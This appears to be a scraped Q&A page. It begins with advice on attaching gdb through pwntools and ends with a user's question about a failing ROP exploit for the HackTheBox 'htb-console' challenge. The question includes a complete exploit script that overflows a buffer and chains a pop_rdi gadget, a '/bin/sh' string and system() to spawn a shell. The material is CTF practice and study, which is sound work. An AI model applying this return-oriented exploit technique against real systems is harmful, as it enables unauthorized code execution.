You can use the pwnlib.gdb to interface with gdb.
You can use the gdb.attach() function: From the docs:
bash = process('bash')
# Attach the debugger
gdb.attach(bash, '''
set follow-fork-mode child
break execve
continue
''')
# Interact with the process
bash.sendline('whoami')
or you can use gdb.debug():
# Create a new process, and stop it at 'main'
io = gdb.debug('bash', '''
# Wait until we hit the main executable's entry point
break _start
continue
# Now set breakpoint on shared library routines
break malloc
break free
continue
''')
# Send a command to Bash
io.sendline("echo hello")
# Interact with the process
io.interactive()
The pwntools template contains code to get you started with debugging with gdb. You can create the pwntools template by running pwn template ./binary_name > template.py. Then you have to add the GDB arg when you run template.py to debug: ./template.py GDB.
If you get [ERROR] Could not find a terminal binary to use., you might need to set context.terminal before you use gdb.
If you're using tmux, the following will automatically open up a gdb debugging session in a new horizontally split window:
context.terminal = ["tmux", "splitw", "-h"]
And to split the screen with the new gdb session window vertically:
context.terminal = ["tmux", "splitw", "-v"]
(Note: I never got this part working, so idk if it'll work. Tell me if you get the gdb thing working).
(To use tmux, install tmux on your machine, and then just type tmux to start it. Then type python template.py GDB.
If none of the above works, then you can always just start your script, use ps aux, find the PID, and then use gdb -p PID to attach to the running process.
using gdb.attach, no shell is opened, even if pwntools say it
Different behaviour when debugging in gdb vs. pwntools
Unanswered 'pwntools' Questions - Stack Overflow
Kate with Konsole as terminal on Windows
I'm trying myself at the HackTheBox Binary challenge "htb-console".
It's a simple ROP challenge where you have to inject a 0x30 byte payload into an char buf[0x10]. Buf is at $rbp-0x10.
I chose to use gadgets from the libc in use by the elf (I just noticed that this might not work on the remote but lets just pretend it does).
When manually patching the stack in gdb with the system call, pop_rdi gadget etc. everything worked fine but when trying to do the exact same with pwntools I get a segfault. I also tried to attach gdb through pwntools and noticed that in the attached session the stack looked like it was correctly injected but I couldn't dereference any of the libc gadget addresses (SEGFAULT).
I feel like it's crucial to understand why the the exploit segfaults although it's the exact same binary running on the exact same system.
Here is the exploit file:
from pwn import *
context.terminal = ["terminator", "-e"]
sh = process("./htb-console")
# sh = gdb.debug(
# "./htb-console",
# """
# b *0x401395
# c
# """,
# )
buf_len = 0x10
# All these addresses work in gdb
libc_base = 0x007FFFF7DB1000
system = 0x401040
pop_rdi = 0x23835 + libc_base
bin_sh = 0x198031 + libc_base
ret = 0xF6C10 + libc_base
payload = b"A" * buf_len
payload += struct.pack("<Q", pop_rdi)
payload += struct.pack("<Q", bin_sh)
payload += struct.pack("<Q", ret)
payload += struct.pack("<Q", system)
# save payload
with open("payload.bin", "wb") as f:
f.write(payload)
sh.sendlineafter(b">> ", b"flag")
sh.sendlineafter(b"Enter flag: ", payload)
sh.interactive()I know that I can use p64() instead of struct.pack
Thanks in advance